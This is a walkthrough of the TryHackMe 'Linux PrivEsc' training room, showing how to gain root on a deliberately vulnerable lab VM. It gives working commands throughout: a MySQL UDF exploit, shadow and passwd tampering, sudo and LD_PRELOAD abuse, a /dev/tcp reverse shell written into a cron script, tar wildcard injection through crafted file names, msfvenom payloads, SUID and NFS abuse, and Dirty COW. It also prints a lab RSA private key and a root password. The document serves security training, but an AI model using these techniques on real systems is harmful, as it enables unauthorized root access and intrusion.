TryHackMe - Linux PrivEsc - Walkthrough

Introduction

Today we're going to be doing a walkthrough for the Liinux PrivEsc room hosted at https://tryhackme.com/room/linuxprivesc . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed Debian Linux client as the the victim machine.

Task 1 - Deploy the Vulnerable Debian VM

Press the green button here:

The Debian machine should come online after a minute or two. The IP address of the machine can be found here:

Of course, the actual IP address will probably be a different one from the one in the screenshot. For the examples, however, we will use the IP address of 10.10.108.118

Next, connect to the Debian machine via SSH from our Kali Linux machine:

ssh user@10.10.108.118
yes
Enter password: password321

Questions:

Deploy the machine and login to the "user" account using SSH.

No answer needed

Run the "id" command. What is the result?

id

uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)

Task 2 - Service Exploits

Change into the /home/user/tools/mysql-udf directory:

cd /home/user/tools/mysql-udf

Compile the raptor_udf2.c exploit code using the following commands:

gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Connect to the MySQL service as the root user with a blank password:

mysql -u root

Execute the following commands on the MySQL shell to create a User Defined Function (UDF) "do_system" using our compiled exploit:

use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';

Use the function to copy /bin/bash to /tmp/rootbash and set the SUID permission:

select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');

Exit out of the MySQL shell (type exit or \q and press Enter) and run the /tmp/rootbash executable with -p to gain a shell running with root privileges:

\q
/tmp/rootbash -p

Remember to remove the /tmp/rootbash executable and exit out of the root shell before continuing as you will create this file again later in the room!

rm /tmp/rootbash
exit

Questions

Read and following along with the above

No answer needed

Task 3 - Weak File Permissions - Readable /etc/shadow

Note that the /etc/shadow file on the VM is world-readable:

ls -l /etc/shadow

View the contents of the /etc/shadow file:

cat /etc/shadow/

Save the root user's hash to a file called hash.txt on your Kali VM and use john the ripper to crack it. You may have to unzip /usr/share/wordlists/rockyou.txt.gz first and run the command using sudo depending on your version of Kali:

echo "$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298" > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Switch to the root user, using the cracked password:

su root
enter password: password123
su user

Questions

What is the root user's password hash?

$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0

What hashing algorithm was used to produce the root user's password hash?

sha512crypt

What is the root user's password?

password123

Task 4 - Weak File Permissions - Writable /etc/shadow

Note that the /etc/shadow file on the VM is world-writable:

ls -l /etc/shadow

Generate a new password hash with a password of your choice:

mkpasswd -m sha-512 newpasswordhere

Edit the /etc/shadow file and replace the original root user's password hash with the one you just generated.

copy password hash from previous command with shift + ctrl + c
vim /etc/shadow
i
cursor over to root user's password hash and delete it
shift + ctrl + v to paste in new password hash
Esc key to enter normal mode in vim, then:
:wq

Switch to the root user, using the new password:

su root
enter password: newpasswordhere
su user

Questions

Read and follow along with the above.

No answer needed

Task 5 - Weak Files Permissions - Writable /etc/passwd

Note that the /etc/passwd file is world-writable:

ls -l /etc/passwd

Generate a new password hash with a password of your choice:

openssl passwd newpass

Edit the /etc/passwd file and place the generated password hash between the first and second colon (:) of the root user's row (replacing the "x").

vim /etc/passwd
i
Replace x in first line with the output of the Openssl command
Press the Esc key.
:wq

Switch to the root user, using the new password:

su root
Enter password: newpass

Alternatively, copy the root user's row and append it to the bottom of the file, changing the first instance of the word "root" to "newroot" and placing the generated password hash between the first and second colon (replacing the "x").

echo 'newroot:bGaDQrdB5b2gs:0:0:root:/root:/bin/bash' >> /etc/passwd

Now switch to the newroot user, using the new password:

su user
su newroot
Enter password: newpass

Remember to exit out of the root shell before continuing!

su user

Questions

Run the "id" command as the newroot user. What is the result?

su newroot
Enter password: newpass
id
su user

uid=0(root) gid=0(root) groups=0(root)

Task 6 - Sudo - Shell Escape Sequences

List the programs which sudo allows your user to run:

sudo -l

Choose a program from the list and try to gain a root shell, using the instructions from GTFOBins.

https://gtfobins.github.io
search string: iftop

https://gtfobins.github.io/gtfobins/iftop/#sudo

sudo iftop

!/bin/sh
whoami

exit
Press ctrl-c

Questions

How many programs is “user” allowed to run via sudo?

11

One program on the list doesn't have a shell escape sequence on GTFOBins. Which is it?

apache2

Consider how you might use this program with sudo to gain root privileges without a shell escape sequence.

No answer needed

Task 7- Sudo - Environment Variables

Check which environment variables are inherited (look for the env_keep options):

sudo -l

Create a shared object using the code located at /home/user/tools/sudo/preload.c:

gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c

Run one of the programs you are allowed to run via sudo (listed when running sudo -l), while setting the LD_PRELOAD environment variable to the full path of the new shared object:

sudo LD_PRELOAD=/tmp/preload.so ftp

exit

exit

Run ldd against the apache2 program file to see which shared libraries are used by the program:

ldd /usr/sbin/apache2

Create a shared object with the same name as one of the listed libraries (libcrypt.so.1) using the code located at /home/user/tools/sudo/library_path.c:

gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c

Run apache2 using sudo, while settings the LD_LIBRARY_PATH environment variable to /tmp (where we output the compiled shared object):

sudo LD_LIBRARY_PATH=/tmp apache2

exit

Questions

Read and follow along with the above.

No answer needed

Task 8- Cron Jobs - File Permissions

View the contents of the system-wide crontab:

cat /etc/crontab

Locate the full path of the overwrite.sh file:

locate overwrite.sh

Note that the file is world-writable:

ls -l /usr/local/bin/overwrite.sh

Replace the contents of the overwrite.sh file with the following after changing the IP address to that of your Kali box.

-------------------------------------------------------------
#!/bin/bash
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
-------------------------------------------------------------

echo ‘#!/bin/bash’ > /usr/local/bin/overwrite.sh
echo ‘bash -i >& /dev/tcp/10.2.99.999/4444 0>&1’ >> /usr/local/bin/overwrite.sh

Set up a netcat listener on your Kali box on port 4444 and wait for the cron job to run (should not take longer than a minute). A root shell should connect back to your netcat listener.

nc -nlvp 4444

Remember to exit out of the root shell and remove the reverse shell code before continuing!

From reverse shell:
exit
From SSH shell:
echo ‘’ > /usr/local/bin/overwrite.sh

Questions

Read and follow along with the above

No answer needed

Task 9 - Cron Jobs - PATH Environment Variable

View the contents of the system-wide crontab:

cat /etc/crontab

Create a file called overwrite.sh in your home directory with the following contents:

---------------------------------------
#!/bin/bash

cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
---------------------------------------

cd ~
echo ‘#!/bin/bash' > overwrite.sh
echo ‘’ >> overwrite.sh
echo ‘cp /bin/bash /tmp/rootbash’ >> overwrite.sh
echo ‘chmod +xs /tmp/rootbash’ >> overwrite.sh
cat overwrite.sh

Make sure that the file is executable:

chmod +x /home/user/overwrite.sh

Wait for the cron job to run (should not take longer than a minute). Run the /tmp/rootbash command with -p to gain a shell running with root privileges:

/tmp/rootbash -p
whoami

Remember to remove the modified code, remove the /tmp/rootbash executable and exit out of the elevated shell before continuing as you will create this file again later in the room!

echo ‘’ > /home/user/overwrite.sh
rm /tmp/rootbash
exit

Questions

What is the value of the PATH variable in /etc/crontab?

/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

Task 10 - Cron Jobs - Wildcards

View the contents of the other cron job script:

cat /usr/local/bin/compress.sh

Use msfvenom on your Kali box to generate a reverse shell ELF binary. Update the LHOST IP address accordingly:

From Kali attacking machine:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.2.99.999 LPORT=4444 -f elf -o shell.elf
sudo python -m SimpleHTTPServer 80
From Debian machine:
wget http://10.2.99.999/shell.elf

Transfer the shell.elf file to /home/user/ on the Debian VM (you can use scp or host the file on a webserver on your Kali box and use wget). Make sure the file is executable:

chmod +x /home/user/shell.elf

Create these two files in /home/user:

touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf

Set up a netcat listener on your Kali box on port 4444 and wait for the cron job to run (should not take longer than a minute). A root shell should connect back to your netcat listener.

sudo nc -nlvp 4444
whoami
exit

Remember to exit out of the root shell and delete all the files you created to prevent the cron job from executing again:

rm /home/user/shell.elf
rm /home/user/--checkpoint=1
rm /home/user/--checkpoint-action=exec=shell.elf

Questions

Read and follow along with the above.

No answer needed

Task 11 - SUID / SGID Executables - Known Exploits

Find all the SUID/SGID executables on the Debian VM:

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

Run the exploit script to gain a root shell:

/home/user/tools/suid/exim/cve-2016-1531.sh

Remember to exit out of the root shell before continuing!

exit

Questions

Read and follow along with the above.

No answer needed

Task 12 - SUID / SGID Executables - Shared Object Injection

First, execute the file and note that currently it displays a progress bar before exiting:

/usr/local/bin/suid-so

Run strace on the file and search the output for open/access calls and for "no such file" errors:

strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file"

Create the .config directory for the libcalc.so file:

mkdir /home/user/.config

Example shared object code can be found at /home/user/tools/suid/libcalc.c. It simply spawns a Bash shell. Compile the code into a shared object at the location the suid-so executable was looking for it:

gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/tools/suid/libcalc.c

Execute the suid-so executable again, and note that this time, instead of a progress bar, we get a root shell.

/usr/local/bin/suid-so

Remember to exit out of the root shell before continuing!

exit

Questions

Read and follow along with the above.

No answer needed

Task 13 - SUID / SGID Executables - Environment Variables

First, execute the file and note that it seems to be trying to start the apache2 webserver:

/usr/local/bin/suid-env

Run strings on the file to look for strings of printable characters:

strings /usr/local/bin/suid-env

Compile the code located at /home/user/tools/suid/service.c into an executable called service. This code simply spawns a Bash shell:

gcc -o service /home/user/tools/suid/service.c

Prepend the current directory (or where the new service executable is located) to the PATH variable, and run the suid-env executable to gain a root shell:

PATH=.:$PATH /usr/local/bin/suid-env

Remember to exit out of the root shell before continuing!

exit

Questions

Read and follow along with the above.

No answer needed

Task 14 - SUID / SGID Executables - Abusing Shell Features (#1)

Verify this with strings:

strings /usr/local/bin/suid-env2

Verify the version of Bash installed on the Debian VM is less than 4.2-048:

/bin/bash --version

Create a Bash function with the name "/usr/sbin/service" that executes a new Bash shell (using -p so permissions are preserved) and export the function:

function /usr/sbin/service { /bin/bash -p; }
export -f /usr/sbin/service

Run the suid-env2 executable to gain a root shell:

/usr/local/bin/suid-env2

Remember to exit out of the root shell before continuing!

exit

Questions

Read and follow along with the above.

No answer needed

Task 15 - SUID / SGID Executables - Abusing Shell Features (#2)

Run the /usr/local/bin/suid-env2 executable with bash debugging enabled and the PS4 variable set to an embedded command which creates an SUID version of /bin/bash:

env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2

Run the /tmp/rootbash executable with -p to gain a shell running with root privileges:

/tmp/rootbash -p

Remember to remove the /tmp/rootbash executable and exit out of the elevated shell before continuing as you will create this file again later in the room!

rm /tmp/rootbash
exit

Questions

Read and follow along with the above.

No answer needed

Task 16 - Passwords & Keys - History Files

View the contents of all the hidden history files in the user's home directory:

cat ~/.*history | less
:q

Switch to the root user, using the password:

su root
Enter password: password123

Remember to exit out of the root shell before continuing!

exit

Questions

What is the full mysql command the user executed?

mysql -h somehost.local -uroot -ppassword123

Task 17 - Passwords & Keys - Config Files

List the contents of the user's home directory:

ls /home/user

Note the presence of a myvpn.ovpn config file. View the contents of the file:

cat /home/user/myvpn.ovpn

The file should contain a reference to another location where the root user's credentials can be found. Switch to the root user, using the credentials:

cat /etc/openvpn/auth.txt

su root

Enter password: password123

Remember to exit out of the root shell before continuing!

exit

Questions

What file did you find the root user's credentials in?

/etc/openvpn/auth.txt

Task 18 - Passwords & Keys - SSH Keys

Look for hidden files & directories in the system root:

ls -la /

Note that there appears to be a hidden directory called .ssh. View the contents of the directory:

ls -l / .ssh

Copy the key over to your Kali box (it's easier to just view the contents of the root_key file and copy/paste the key) and give it the correct permissions, otherwise your SSH client will refuse to use it:

cat /.ssh/root_key

Copy output

From Kali Linux machine:
echo “-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA3IIf6Wczcdm38MZ9+QADSYq9FfKfwj0mJaUteyJHWHZ3/GNm
gLTH3Fov2Ss8QuGfvvD4CQ1f4N0PqnaJ2WJrKSP8QyxJ7YtRTk0JoTSGWTeUpExl
p4oSmTxYnO0LDcsezwNhBZn0kljtGu9p+dmmKbk40W4SWlTvU1LcEHRr6RgWMgQo
OHhxUFddFtYrknS4GiL5TJH6bt57xoIECnRc/8suZyWzgRzbo+TvDewK3ZhBN7HD
eV9G5JrjnVrDqSjhysUANmUTjUCTSsofUwlum+pU/dl9YCkXJRp7Hgy/QkFKpFET
Z36Z0g1JtQkwWxUD/iFj+iapkLuMaVT5dCq9kQIDAQABAoIBAQDDWdSDppYA6uz2
NiMsEULYSD0z0HqQTjQZbbhZOgkS6gFqa3VH2OCm6o8xSghdCB3Jvxk+i8bBI5bZ
YaLGH1boX6UArZ/g/mfNgpphYnMTXxYkaDo2ry/C6Z9nhukgEy78HvY5TCdL79Q+
5JNyccuvcxRPFcDUniJYIzQqr7laCgNU2R1lL87Qai6B6gJpyB9cP68rA02244el
WUXcZTk68p9dk2Q3tk3r/oYHf2LTkgPShXBEwP1VkF/2FFPvwi1JCCMUGS27avN7
VDFru8hDPCCmE3j4N9Sw6X/sSDR9ESg4+iNTsD2ziwGDYnizzY2e1+75zLyYZ4N7
6JoPCYFxAoGBAPi0ALpmNz17iFClfIqDrunUy8JT4aFxl0kQ5y9rKeFwNu50nTIW
1X+343539fKIcuPB0JY9ZkO9d4tp8M1Slebv/p4ITdKf43yTjClbd/FpyG2QNy3K
824ihKlQVDC9eYezWWs2pqZk/AqO2IHSlzL4v0T0GyzOsKJH6NGTvYhrAoGBAOL6
Wg07OXE08XsLJE+ujVPH4DQMqRz/G1vwztPkSmeqZ8/qsLW2bINLhndZdd1FaPzc
U7LXiuDNcl5u+Pihbv73rPNZOsixkklb5t3Jg1OcvvYcL6hMRwLL4iqG8YDBmlK1
Rg1CjY1csnqTOMJUVEHy0ofroEMLf/0uVRP3VsDzAoGBAIKFJSSt5Cu2GxIH51Zi
SXeaH906XF132aeU4V83ZGFVnN6EAMN6zE0c2p1So5bHGVSCMM/IJVVDp+tYi/GV
d+oc5YlWXlE9bAvC+3nw8P+XPoKRfwPfUOXp46lf6O8zYQZgj3r+0XLd6JA561Im
jQdJGEg9u81GI9jm2D60xHFFAoGAPFatRcMuvAeFAl6t4njWnSUPVwbelhTDIyfa
871GglRskHslSskaA7U6I9QmXxIqnL29ild+VdCHzM7XZNEVfrY8xdw8okmCR/ok
X2VIghuzMB3CFY1hez7T+tYwsTfGXKJP4wqEMsYntCoa9p4QYA+7I+LhkbEm7xk4
CLzB1T0CgYB2Ijb2DpcWlxjX08JRVi8+R7T2Fhh4L5FuykcDeZm1OvYeCML32EfN
Whp/Mr5B5GDmMHBRtKaiLS8/NRAokiibsCmMzQegmfipo+35DNTW66DDq47RFgR4
LnM9yXzn+CbIJGeJk5XUFQuLSv0f6uiaWNi7t9UNyayRmwejI6phSw==
-----END RSA PRIVATE KEY-----” > root_key
chmod 600 key_key

Use the key to login to the Debian VM as the root account (change the IP accordingly):

ssh -i root_key root@10.10.33.186

Remember to exit out of the root shell before continuing!

exit

Questions

Read and follow along with the above.

No answer needed

Task 19 - NFS

Check the NFS share configuration on the Debian VM:

cat /etc/exports

On your Kali box, switch to your root user if you are not already running as root:

sudo su

Using Kali's root user, create a mount point on your Kali box and mount the /tmp share (update the IP accordingly):

mkdir /tmp/nfs
mount -o rw,vers=2 10.10.10.10:/tmp /tmp/nfs

Still using Kali's root user, generate a payload using msfvenom and save it to the mounted share (this payload simply calls /bin/bash):

msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf

Still using Kali's root user, make the file executable and set the SUID permission:

chmod +xs /tmp/nfs/shell.elf

Back on the Debian VM, as the low privileged user account, execute the file to gain a root shell:

/tmp/shell.elf
whoami

Remember to exit out of the root shell before continuing!

exit

Questions

What is the name of the option that disables root squashing?

no_root_squash

Task 20 - Kernel Exploits

Run the Linux Exploit Suggester 2 tool to identify potential kernel exploits on the current system:

perl /home/user/tools/kernel-exploits/linux-exploit-suggester-2/linux-exploit-suggester-2.pl

Compile the code and run it (note that it may take several minutes to complete):

gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w
./c0w

Once the exploit completes, run /usr/bin/passwd to gain a root shell:

/usr/bin/passwd

Remember to restore the original /usr/bin/passwd file and exit the root shell before continuing!

mv /tmp/bak /usr/bin/passwd
exit

Questions

Read and follow along with the above

No answer needed

Task 21 - Privilege Escalation Scripts

Question

Experiment with all three tools, running them with different options. Do all of them identify the techniques used in this room?

No answer needed

Unofficial answer:

The linpeas script is the easiest to use, due to its color coding.  The lse script is also color-coded, but the differences in color can be hard to pick up on.  The LinEnum script produces the most output, but can be hard to read, due to its absence of color-coding.  As of the writing of this walkthrough, linpeas is the script updated the most recently on github.